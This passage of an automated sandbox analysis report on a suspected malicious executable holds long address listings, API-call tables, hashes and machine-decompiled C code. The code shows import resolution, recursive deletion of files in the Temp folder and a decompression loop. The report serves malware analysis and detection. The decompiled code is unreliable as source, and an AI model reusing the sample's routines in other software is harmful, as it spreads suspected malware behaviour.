                                                                                                                    0x00000000
                                                                                                                    0x10001dc4
                                                                                                                    0x10001da8
                                                                                                                    0x10001ef6
                                                                                                                    0x10001ef6
                                                                                                                    0x10001ef8
                                                                                                                    0x10002225
                                                                                                                    0x10002228
                                                                                                                    0x10002289
                                                                                                                    0x10001f62
                                                                                                                    0x10001f62
                                                                                                                    0x10001f62
                                                                                                                    0x00000000
                                                                                                                    0x10001f62
                                                                                                                    0x1000222a
                                                                                                                    0x1000222d
                                                                                                                    0x10002239
                                                                                                                    0x1000223c
                                                                                                                    0x1000223d
                                                                                                                    0x10002240
                                                                                                                    0x10002247
                                                                                                                    0x1000224a
                                                                                                                    0x1000224b
                                                                                                                    0x1000224e
                                                                                                                    0x10002295
                                                                                                                    0x10002298
                                                                                                                    0x1000229b
                                                                                                                    0x00000000
                                                                                                                    0x1000229b
                                                                                                                    0x10002250
                                                                                                                    0x10002253
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002255
                                                                                                                    0x1000225c
                                                                                                                    0x1000225c
                                                                                                                    0x10002262
                                                                                                                    0x10002265
                                                                                                                    0x10002281
                                                                                                                    0x10002267
                                                                                                                    0x10002270
                                                                                                                    0x10002273
                                                                                                                    0x10002273
                                                                                                                    0x00000000
                                                                                                                    0x10002265
                                                                                                                    0x10002242
                                                                                                                    0x00000000
                                                                                                                    0x10002242
                                                                                                                    0x1000222f
                                                                                                                    0x10002232
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002234
                                                                                                                    0x10002237
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002237
                                                                                                                    0x10001efe
                                                                                                                    0x10001efe
                                                                                                                    0x10001eff
                                                                                                                    0x10002026
                                                                                                                    0x10002026
                                                                                                                    0x1000202b
                                                                                                                    0x1000202e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000203b
                                                                                                                    0x00000000
                                                                                                                    0x100021cd
                                                                                                                    0x100021d0
                                                                                                                    0x100021d3
                                                                                                                    0x100021d3
                                                                                                                    0x100021d4
                                                                                                                    0x100021d7
                                                                                                                    0x100021d9
                                                                                                                    0x100021db
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x100021dd
                                                                                                                    0x100021dd
                                                                                                                    0x100021e0
                                                                                                                    0x100021f2
                                                                                                                    0x100021f5
                                                                                                                    0x100021fe
                                                                                                                    0x00000000
                                                                                                                    0x100021fe
                                                                                                                    0x100021e2
                                                                                                                    0x100021e2
                                                                                                                    0x100021e4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x100021e6
                                                                                                                    0x100021e8
                                                                                                                    0x100021ea
                                                                                                                    0x100021ea
                                                                                                                    0x100021ea
                                                                                                                    0x100021eb
                                                                                                                    0x100021ed
                                                                                                                    0x100021ef
                                                                                                                    0x100021d3
                                                                                                                    0x100021d4
                                                                                                                    0x100021d7
                                                                                                                    0x100021d9
                                                                                                                    0x100021db
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x100021db
                                                                                                                    0x00000000
                                                                                                                    0x10002082
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000208e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002075
                                                                                                                    0x10002079
                                                                                                                    0x1000207d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000219f
                                                                                                                    0x100021a3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x100021a9
                                                                                                                    0x100021b1
                                                                                                                    0x100021b8
                                                                                                                    0x100021c0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002147
                                                                                                                    0x10002147
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000221d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000220d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002211
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002219
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000215f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000214f
                                                                                                                    0x10002151
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002167
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002157
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000215b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002215
                                                                                                                    0x1000221f
                                                                                                                    0x1000221f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000216f
                                                                                                                    0x10002173
                                                                                                                    0x10002178
                                                                                                                    0x1000217b
                                                                                                                    0x1000217c
                                                                                                                    0x1000217f
                                                                                                                    0x10002185
                                                                                                                    0x10002185
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002205
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002097
                                                                                                                    0x10002097
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002163
                                                                                                                    0x10002169
                                                                                                                    0x10002169
                                                                                                                    0x10002099
                                                                                                                    0x10002099
                                                                                                                    0x1000209c
                                                                                                                    0x1000209e
                                                                                                                    0x100020a1
                                                                                                                    0x100020a2
                                                                                                                    0x100020a6
                                                                                                                    0x100020a9
                                                                                                                    0x100020ac
                                                                                                                    0x100020b2
                                                                                                                    0x100020bf
                                                                                                                    0x100020bf
                                                                                                                    0x100020c1
                                                                                                                    0x100020c1
                                                                                                                    0x100020c4
                                                                                                                    0x100020ca
                                                                                                                    0x100020cc
                                                                                                                    0x100020d0
                                                                                                                    0x100020d5
                                                                                                                    0x100020d5
                                                                                                                    0x100020d7
                                                                                                                    0x100020d7
                                                                                                                    0x100020da
                                                                                                                    0x100020dd
                                                                                                                    0x100020e6
                                                                                                                    0x100020e9
                                                                                                                    0x100020ec
                                                                                                                    0x100020ec
                                                                                                                    0x100020ee
                                                                                                                    0x100020f1
                                                                                                                    0x100020f7
                                                                                                                    0x00000000
                                                                                                                    0x100020f7
                                                                                                                    0x100020b4
                                                                                                                    0x100020bb
                                                                                                                    0x100020bd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002042
                                                                                                                    0x10002048
                                                                                                                    0x1000204b
                                                                                                                    0x1000204d
                                                                                                                    0x1000204d
                                                                                                                    0x10002050
                                                                                                                    0x10002054
                                                                                                                    0x10002061
                                                                                                                    0x10002063
                                                                                                                    0x10002069
                                                                                                                    0x10002069
                                                                                                                    0x10002069
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000218d
                                                                                                                    0x10002191
                                                                                                                    0x10002196
                                                                                                                    0x10002199
                                                                                                                    0x100020fd
                                                                                                                    0x100020fd
                                                                                                                    0x100020ff
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002105
                                                                                                                    0x10002105
                                                                                                                    0x10002109
                                                                                                                    0x10002110
                                                                                                                    0x10002134
                                                                                                                    0x10002134
                                                                                                                    0x10002138
                                                                                                                    0x1000213a
                                                                                                                    0x1000213d
                                                                                                                    0x1000213d
                                                                                                                    0x10002140
                                                                                                                    0x10002140
                                                                                                                    0x00000000
                                                                                                                    0x10002138
                                                                                                                    0x10002115
                                                                                                                    0x10002118
                                                                                                                    0x10002118
                                                                                                                    0x1000211f
                                                                                                                    0x10002121
                                                                                                                    0x10002124
                                                                                                                    0x1000212b
                                                                                                                    0x1000212c
                                                                                                                    0x10002132
                                                                                                                    0x10002132
                                                                                                                    0x00000000
                                                                                                                    0x10002132
                                                                                                                    0x10002126
                                                                                                                    0x10002129
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000203b
                                                                                                                    0x10001f05
                                                                                                                    0x10001f05
                                                                                                                    0x10001f06
                                                                                                                    0x10002023
                                                                                                                    0x00000000
                                                                                                                    0x10002023
                                                                                                                    0x10001f0c
                                                                                                                    0x10001f0d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001f13
                                                                                                                    0x10001f13
                                                                                                                    0x10001f16
                                                                                                                    0x10001f5f
                                                                                                                    0x00000000
                                                                                                                    0x10001f5f
                                                                                                                    0x10001f18
                                                                                                                    0x10001f18
                                                                                                                    0x10001f1b
                                                                                                                    0x10001f43
                                                                                                                    0x10001f46
                                                                                                                    0x10001f49
                                                                                                                    0x10002015
                                                                                                                    0x10002015
                                                                                                                    0x10002015
                                                                                                                    0x10001f4f
                                                                                                                    0x10001f4f
                                                                                                                    0x10001f4f
                                                                                                                    0x1000201b
                                                                                                                    0x00000000
                                                                                                                    0x1000201b
                                                                                                                    0x10001f1e
                                                                                                                    0x10001f1e
                                                                                                                    0x10001f1f
                                                                                                                    0x10001f40
                                                                                                                    0x10001f42
                                                                                                                    0x10001f42
                                                                                                                    0x00000000
                                                                                                                    0x10001f42
                                                                                                                    0x10001f21
                                                                                                                    0x10001f21
                                                                                                                    0x10001f24
                                                                                                                    0x10001f3c
                                                                                                                    0x00000000
                                                                                                                    0x10001f3c
                                                                                                                    0x10001f26
                                                                                                                    0x10001f28
                                                                                                                    0x10001f29
                                                                                                                    0x10001f29
                                                                                                                    0x10001f2b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001f2d
                                                                                                                    0x10001f2d
                                                                                                                    0x10001f2e
                                                                                                                    0x10001f38
                                                                                                                    0x00000000
                                                                                                                    0x10001f38
                                                                                                                    0x10001f31
                                                                                                                    0x10001f32
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001f34
                                                                                                                    0x00000000
                                                                                                                    0x10001dae
                                                                                                                    0x10001dae
                                                                                                                    0x10001db1
                                                                                                                    0x00000000
                                                                                                                    0x10001db1
                                                                                                                    0x10001da8
                                                                                                                    0x10001f80
                                                                                                                    0x10001f85
                                                                                                                    0x10001f8a
                                                                                                                    0x10001f8e
                                                                                                                    0x1000233d
                                                                                                                    0x10002343
                                                                                                                    0x10001fa0
                                                                                                                    0x10001fa2
                                                                                                                    0x10001fa3
                                                                                                                    0x100022c0
                                                                                                                    0x100022c0
                                                                                                                    0x100022c3
                                                                                                                    0x100022c6
                                                                                                                    0x100022da
                                                                                                                    0x100022e0
                                                                                                                    0x100022e2
                                                                                                                    0x100022e8
                                                                                                                    0x100022fb
                                                                                                                    0x10002301
                                                                                                                    0x10002301
                                                                                                                    0x1000230e
                                                                                                                    0x10002310
                                                                                                                    0x10002312
                                                                                                                    0x10002318
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002320
                                                                                                                    0x1000232d
                                                                                                                    0x1000232f
                                                                                                                    0x10002331
                                                                                                                    0x10002331
                                                                                                                    0x10002337
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002339
                                                                                                                    0x10002339
                                                                                                                    0x10002339
                                                                                                                    0x10002339
                                                                                                                    0x00000000
                                                                                                                    0x10002339
                                                                                                                    0x100022eb
                                                                                                                    0x100022f1
                                                                                                                    0x100022f3
                                                                                                                    0x100022f9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x100022f9
                                                                                                                    0x100022c8
                                                                                                                    0x100022cf
                                                                                                                    0x100022d5
                                                                                                                    0x00000000
                                                                                                                    0x100022d5
                                                                                                                    0x10001fa9
                                                                                                                    0x10001faa
                                                                                                                    0x100022a2
                                                                                                                    0x100022a2
                                                                                                                    0x100022a8
                                                                                                                    0x100022ab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x100022b2
                                                                                                                    0x100022b7
                                                                                                                    0x100022b8
                                                                                                                    0x00000000
                                                                                                                    0x100022b8
                                                                                                                    0x10001fb1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001fb7
                                                                                                                    0x10001fb7
                                                                                                                    0x10001fc0
                                                                                                                    0x10001fc5
                                                                                                                    0x10001fcb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001fd1
                                                                                                                    0x10001fde
                                                                                                                    0x10001fe4
                                                                                                                    0x10001fee
                                                                                                                    0x10001ff4
                                                                                                                    0x10001ffc
                                                                                                                    0x1000200c
                                                                                                                    0x00000000
                                                                                                                    0x1000200c

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001541: GlobalAlloc.KERNELBASE(00000040,10001577,?,?,10001804,?,10001017), ref: 10001549
                                                                                                                      • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                      • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001E28
                                                                                                                    • lstrcpyA.KERNEL32(00000008,?), ref: 10001E74
                                                                                                                    • lstrcpyA.KERNEL32(00000408,?), ref: 10001E7E
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001E98
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001F80
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001F85
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001F8A
                                                                                                                    • GlobalFree.KERNEL32 ref: 1000212C
                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10002273
                                                                                                                    • GetModuleHandleA.KERNEL32(00000008), ref: 100022DA
                                                                                                                    • LoadLibraryA.KERNEL32(00000008), ref: 100022EB
                                                                                                                    • GetProcAddress.KERNEL32(?,00000408), ref: 1000230E
                                                                                                                    • lstrcatA.KERNEL32(00000408,10004024), ref: 10002320
                                                                                                                    • GetProcAddress.KERNEL32(?,00000408), ref: 1000232D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Free$lstrcpy$AddressAllocProc$HandleLibraryLoadModulelstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2432367840-0
                                                                                                                    • Opcode ID: 3818cbf0824076af76067ca21706b0dae5062f5e1d4de8adee62f854b1445e57
                                                                                                                    • Instruction ID: 98843f7ed549c9a0ea4508068d46c46912eefce37284e078a37cbced179c0dd6
                                                                                                                    • Opcode Fuzzy Hash: 3818cbf0824076af76067ca21706b0dae5062f5e1d4de8adee62f854b1445e57
                                                                                                                    • Instruction Fuzzy Hash: FF02AC71D0464ADFEB60CFA4C8807EEBBF4FB043C4F21852AE5A5A7189D7749A81CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                                    0x004054c8
                                                                                                                    0x004054cc
                                                                                                                    0x004054d5
                                                                                                                    0x004054d8
                                                                                                                    0x004054db
                                                                                                                    0x004054e3
                                                                                                                    0x004054e5
                                                                                                                    0x004054e6
                                                                                                                    0x00000000
                                                                                                                    0x004054e6
                                                                                                                    0x004054f5
                                                                                                                    0x004054f5
                                                                                                                    0x004054f8
                                                                                                                    0x004054fb
                                                                                                                    0x0040550f
                                                                                                                    0x00405516
                                                                                                                    0x0040551b
                                                                                                                    0x0040551d
                                                                                                                    0x0040552d
                                                                                                                    0x0040551f
                                                                                                                    0x00405525
                                                                                                                    0x00405525
                                                                                                                    0x00405532
                                                                                                                    0x00405535
                                                                                                                    0x00405540
                                                                                                                    0x00405546
                                                                                                                    0x0040554b
                                                                                                                    0x0040555b
                                                                                                                    0x0040555d
                                                                                                                    0x00405563
                                                                                                                    0x00405566
                                                                                                                    0x00405569
                                                                                                                    0x00405626
                                                                                                                    0x00405626
                                                                                                                    0x0040562a
                                                                                                                    0x0040562c
                                                                                                                    0x0040562c
                                                                                                                    0x0040562c
                                                                                                                    0x0040562c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040556f
                                                                                                                    0x0040556f
                                                                                                                    0x00405578
                                                                                                                    0x0040557e
                                                                                                                    0x00405583
                                                                                                                    0x00405586
                                                                                                                    0x00405588
                                                                                                                    0x0040558c
                                                                                                                    0x0040558e
                                                                                                                    0x0040558e
                                                                                                                    0x0040558c
                                                                                                                    0x00405591
                                                                                                                    0x00405594
                                                                                                                    0x004055a7
                                                                                                                    0x004055a9
                                                                                                                    0x004055ae
                                                                                                                    0x004055b5
                                                                                                                    0x004055cd
                                                                                                                    0x004055d3
                                                                                                                    0x004055d9
                                                                                                                    0x004055db
                                                                                                                    0x00405600
                                                                                                                    0x004055dd
                                                                                                                    0x004055dd
                                                                                                                    0x004055e1
                                                                                                                    0x004055f5
                                                                                                                    0x004055e3
                                                                                                                    0x004055e6
                                                                                                                    0x004055ee
                                                                                                                    0x004055ee
                                                                                                                    0x004055e1
                                                                                                                    0x004055b7
                                                                                                                    0x004055bd
                                                                                                                    0x004055bf
                                                                                                                    0x004055c5
                                                                                                                    0x004055c5
                                                                                                                    0x004055bf
                                                                                                                    0x00000000
                                                                                                                    0x004055b5
                                                                                                                    0x00405596
                                                                                                                    0x00405599
                                                                                                                    0x0040559b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040559d
                                                                                                                    0x0040559f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004055a1
                                                                                                                    0x004055a5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405605
                                                                                                                    0x0040560f
                                                                                                                    0x00405615
                                                                                                                    0x00405615
                                                                                                                    0x00405620
                                                                                                                    0x00000000
                                                                                                                    0x00405620
                                                                                                                    0x00405537
                                                                                                                    0x0040553e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004054fd
                                                                                                                    0x004054fd
                                                                                                                    0x004054ff
                                                                                                                    0x00405630
                                                                                                                    0x00405633
                                                                                                                    0x00405636
                                                                                                                    0x00405688
                                                                                                                    0x00405688
                                                                                                                    0x00405688
                                                                                                                    0x00405638
                                                                                                                    0x0040563b
                                                                                                                    0x00405646
                                                                                                                    0x0040564b
                                                                                                                    0x0040564d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405650
                                                                                                                    0x00405656
                                                                                                                    0x0040565c
                                                                                                                    0x00405662
                                                                                                                    0x00405664
                                                                                                                    0x00000000
                                                                                                                    0x00405680
                                                                                                                    0x00405666
                                                                                                                    0x0040566a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040566f
                                                                                                                    0x00000000
                                                                                                                    0x00405676
                                                                                                                    0x0040563d
                                                                                                                    0x0040563d
                                                                                                                    0x00000000
                                                                                                                    0x0040563d
                                                                                                                    0x00405505
                                                                                                                    0x00405509
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405509

                                                                                                                    APIs
                                                                                                                    • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                                                                                    • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                                                                                                    • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                                                                                    • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                                                                                    • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                                                                                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                                                                                                    • FindClose.KERNEL32(?), ref: 00405620
                                                                                                                    Strings
                                                                                                                    • \*.*, xrefs: 0040551F
                                                                                                                    • "C:\Users\user\Desktop\WXs8v9QuE7.exe" , xrefs: 004054BD
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                    • String ID: "C:\Users\user\Desktop\WXs8v9QuE7.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                    • API String ID: 2035342205-837064992
                                                                                                                    • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                                                                                    • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                                                                                                    • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                                                                                    • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
